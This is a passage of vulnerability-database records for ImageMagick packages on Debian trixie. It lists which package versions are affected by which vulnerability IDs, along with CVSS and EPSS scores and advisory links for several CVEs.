vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.43%252Bdfsg1-1%252Bdeb13u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.16%252Bdfsg1-1%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.18%252Bdfsg1-1%3Fdistro=trixie

url	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
purl	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.19%252Bdfsg1-1%3Fdistro=trixie

aliases CVE-2019-17540

risk_score 4.0

exploitability 0.5

weighted_severity 7.9

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-3ju6-ah7s-suhh

url VCID-4dpv-a4ns-hye2

vulnerability_id VCID-4dpv-a4ns-hye2

summary ImageMagick: Possible arbitrary code execution by loading malicious configuration files or shared libraries

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-41817.json

reference_id

reference_type

scores

value	7.3
scoring_system	cvssv3
scoring_elements	CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2024-41817.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2024-41817

reference_id

reference_type

scores

value	0.18593
scoring_system	epss
scoring_elements	0.95277
published_at	2026-04-26T12:55:00Z

value	0.18593
scoring_system	epss
scoring_elements	0.95253
published_at	2026-04-09T12:55:00Z

value	0.18593
scoring_system	epss
scoring_elements	0.95258
published_at	2026-04-11T12:55:00Z

value	0.18593
scoring_system	epss
scoring_elements	0.95259
published_at	2026-04-12T12:55:00Z

value	0.18593
scoring_system	epss
scoring_elements	0.95261
published_at	2026-04-13T12:55:00Z

value	0.18593
scoring_system	epss
scoring_elements	0.9527
published_at	2026-04-16T12:55:00Z

value	0.18593
scoring_system	epss
scoring_elements	0.95273
published_at	2026-04-18T12:55:00Z

value	0.18593
scoring_system	epss
scoring_elements	0.95275
published_at	2026-04-24T12:55:00Z

value	0.18593
scoring_system	epss
scoring_elements	0.95236
published_at	2026-04-02T12:55:00Z

value	0.18593
scoring_system	epss
scoring_elements	0.95238
published_at	2026-04-04T12:55:00Z

value	0.18593
scoring_system	epss
scoring_elements	0.95242
published_at	2026-04-07T12:55:00Z

value	0.18593
scoring_system	epss
scoring_elements	0.9525
published_at	2026-04-08T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2024-41817

reference_url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_id

reference_type

scores

value	7
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=2300498
reference_id	2300498
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=2300498

reference_url

https://github.com/ImageMagick/ImageMagick/commit/6526a2b28510ead6a3e14de711bb991ad9abff38

reference_id

6526a2b28510ead6a3e14de711bb991ad9abff38

reference_type

scores

value	7
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

value	Track*
scoring_system	ssvc
scoring_elements	SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-07-29T16:18:23Z/

url

https://github.com/ImageMagick/ImageMagick/commit/6526a2b28510ead6a3e14de711bb991ad9abff38

reference_url

https://github.com/ImageMagick/ImageMagick/blob/3b22378a23d59d7517c43b65b1822f023df357a0/app-image/AppRun#L11-L14

reference_id

AppRun#L11-L14

reference_type

scores

value	7
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

value	Track*
scoring_system	ssvc
scoring_elements	SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-07-29T16:18:23Z/

url

https://github.com/ImageMagick/ImageMagick/blob/3b22378a23d59d7517c43b65b1822f023df357a0/app-image/AppRun#L11-L14

reference_url

https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-8rxc-922v-phg8

reference_id

GHSA-8rxc-922v-phg8

reference_type

scores

value	7
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

value	Track*
scoring_system	ssvc
scoring_elements	SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-07-29T16:18:23Z/

url

https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-8rxc-922v-phg8

fixed_packages

url	pkg:deb/debian/imagemagick@0?distro=trixie
purl	pkg:deb/debian/imagemagick@0?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@0%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eb4u-x1mt-2uan

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.43%252Bdfsg1-1%252Bdeb13u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.16%252Bdfsg1-1%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.18%252Bdfsg1-1%3Fdistro=trixie

url	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
purl	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.19%252Bdfsg1-1%3Fdistro=trixie

aliases CVE-2024-41817

risk_score null

exploitability null

weighted_severity null

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-4dpv-a4ns-hye2

url VCID-4p71-qkjb-97c6

vulnerability_id VCID-4p71-qkjb-97c6

summary ImageMagick: Division by zero in ConvertXYZToJzazbz() of MagickCore/colorspace.c

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-20310.json

reference_id

reference_type

scores

value	5.3
scoring_system	cvssv3
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-20310.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2021-20310

reference_id

reference_type

scores

value	0.00396
scoring_system	epss
scoring_elements	0.60329
published_at	2026-04-01T12:55:00Z

value	0.00396
scoring_system	epss
scoring_elements	0.60405
published_at	2026-04-02T12:55:00Z

value	0.00396
scoring_system	epss
scoring_elements	0.60432
published_at	2026-04-04T12:55:00Z

value	0.00396
scoring_system	epss
scoring_elements	0.604
published_at	2026-04-07T12:55:00Z

value	0.00396
scoring_system	epss
scoring_elements	0.60448
published_at	2026-04-08T12:55:00Z

value	0.00396
scoring_system	epss
scoring_elements	0.60465
published_at	2026-04-09T12:55:00Z

value	0.00396
scoring_system	epss
scoring_elements	0.60485
published_at	2026-04-11T12:55:00Z

value	0.00396
scoring_system	epss
scoring_elements	0.60472
published_at	2026-04-12T12:55:00Z

value	0.00396
scoring_system	epss
scoring_elements	0.60452
published_at	2026-04-13T12:55:00Z

value	0.00396
scoring_system	epss
scoring_elements	0.60494
published_at	2026-04-16T12:55:00Z

value	0.00396
scoring_system	epss
scoring_elements	0.60502
published_at	2026-04-18T12:55:00Z

value	0.00396
scoring_system	epss
scoring_elements	0.60492
published_at	2026-04-21T12:55:00Z

value	0.00396
scoring_system	epss
scoring_elements	0.60476
published_at	2026-04-24T12:55:00Z

value	0.00396
scoring_system	epss
scoring_elements	0.60491
published_at	2026-04-26T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2021-20310

reference_url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_id

reference_type

scores

value	5.3
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=1946728
reference_id	1946728
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=1946728

fixed_packages

url	pkg:deb/debian/imagemagick@0?distro=trixie
purl	pkg:deb/debian/imagemagick@0?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@0%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eb4u-x1mt-2uan

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.6%2Bdeb12u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-1cpn-zvem-v7gt

vulnerability	VCID-2zje-ag2v-7kac

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-54da-fzyt-4ud2

vulnerability	VCID-6h7x-3rue-kucp

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-cuhw-ew1g-s3h2

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-g41y-dv8u-3yf1

vulnerability	VCID-g679-q851-xub7

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-jcjk-s89c-mbbm

vulnerability	VCID-n47w-r932-abey

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-r3vw-ncns-cqgb

vulnerability	VCID-rbdg-vz8x-ykah

vulnerability	VCID-rjkf-pdny-2fhn

vulnerability	VCID-sw7g-hxxr-n3e1

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-tv15-dcnu-pbbn

vulnerability	VCID-utfe-h3b7-jqcj

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-x8c6-9pse-xkc8

vulnerability	VCID-y58b-be93-hbfd

vulnerability	VCID-zab9-9tqj-hbhg

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.6%252Bdeb12u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.1.43%2Bdfsg1-1%2Bdeb13u5?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-a2qm-vkc3-qkd5

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.1.43%252Bdfsg1-1%252Bdeb13u5%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.16%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-jc5m-7rvc-2qg6

vulnerability	VCID-tt6z-t31v-dkdd

vulnerability	VCID-zvq4-ybph-buga

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.16%252Bdfsg1-1%3Fdistro=trixie

url pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

purl pkg:deb/debian/imagemagick@8:7.1.2.18%2Bdfsg1-1?distro=trixie

is_vulnerable true

affected_by_vulnerabilities

vulnerability	VCID-2yv5-qdeg-9bag

vulnerability	VCID-381g-7gdr-qydg

vulnerability	VCID-441f-z9bp-vbdu

vulnerability	VCID-4s37-h3p7-6uab

vulnerability	VCID-6v1d-1wfr-vqd1

vulnerability	VCID-7gb9-gd78-7bdu

vulnerability	VCID-eeju-vhdm-aqbe

vulnerability	VCID-egwu-28fp-dye6

vulnerability	VCID-j6tc-f4fc-mbcv

vulnerability	VCID-qjxn-gm96-7ygc

vulnerability	VCID-uvkp-1zss-57gr

vulnerability	VCID-w9zg-tsbg-afa1

resource_url http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.18%252Bdfsg1-1%3Fdistro=trixie

url	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
purl	pkg:deb/debian/imagemagick@8:7.1.2.19%2Bdfsg1-1?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:7.1.2.19%252Bdfsg1-1%3Fdistro=trixie

aliases CVE-2021-20310

risk_score null

exploitability null

weighted_severity null

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-4p71-qkjb-97c6

url VCID-4s37-h3p7-6uab

vulnerability_id VCID-4s37-h3p7-6uab

summary ImageMagick: Magick.NET: ImageMagick: Denial of Service via crafted image leading to out-of-bounds write

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-40169.json

reference_id

reference_type

scores

value	6.5
scoring_system	cvssv3
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2026-40169.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2026-40169

reference_id

reference_type

scores

value	0.00012
scoring_system	epss
scoring_elements	0.01567
published_at	2026-04-18T12:55:00Z

value	0.00012
scoring_system	epss
scoring_elements	0.01529
published_at	2026-04-16T12:55:00Z

value	5e-05
scoring_system	epss
scoring_elements	0.00212
published_at	2026-04-26T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2026-40169

reference_url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_id

reference_type

scores

value	6.2
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

url

https://ftp.suse.com/pub/projects/security/yaml/suse-cvss-scores.yaml

reference_url

https://github.com/dlemstra/Magick.NET/releases/tag/14.12.0

reference_id

reference_type

scores

value	6.2
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

value	MODERATE
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T15:52:23Z/

url

https://github.com/dlemstra/Magick.NET/releases/tag/14.12.0

reference_url

https://github.com/ImageMagick/ImageMagick

reference_id

reference_type

scores

value	6.2
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://github.com/ImageMagick/ImageMagick

reference_url

https://github.com/ImageMagick/ImageMagick/commit/f86452a8aea37bf2b4bd36127f836dcc5f138b38

reference_id

reference_type

scores

value	6.2
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

value	MODERATE
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T15:52:23Z/

url

https://github.com/ImageMagick/ImageMagick/commit/f86452a8aea37bf2b4bd36127f836dcc5f138b38

reference_url

https://github.com/ImageMagick/ImageMagick/releases/tag/7.1.2-19

reference_id

reference_type

scores

value	6.2
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

value	MODERATE
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T15:52:23Z/

url

https://github.com/ImageMagick/ImageMagick/releases/tag/7.1.2-19

reference_url

https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-5592-p365-24xh

reference_id

reference_type

scores

value	6.2
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

value	MODERATE
scoring_system	cvssv3.1_qr
scoring_elements

value	MODERATE
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T15:52:23Z/

url

https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-5592-p365-24xh

reference_url

https://nvd.nist.gov/vuln/detail/CVE-2026-40169

reference_id

reference_type

scores

value	6.2
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

value	MODERATE
scoring_system	generic_textual
scoring_elements

url

https://nvd.nist.gov/vuln/detail/CVE-2026-40169

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=2458042
reference_id	2458042
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=2458042

reference_url

https://github.com/advisories/GHSA-5592-p365-24xh

reference_id

GHSA-5592-p365-24xh

reference_type

scores

value	MODERATE
scoring_system	cvssv3.1_qr
scoring_elements

url

https://github.com/advisories/GHSA-5592-p365-24xh

fixed_packages

url	pkg:deb/debian/imagemagick@0?distro=trixie
purl	pkg:deb/debian/imagemagick@0?distro=trixie
is_vulnerable	`false`
affected_by_vulnerabilities
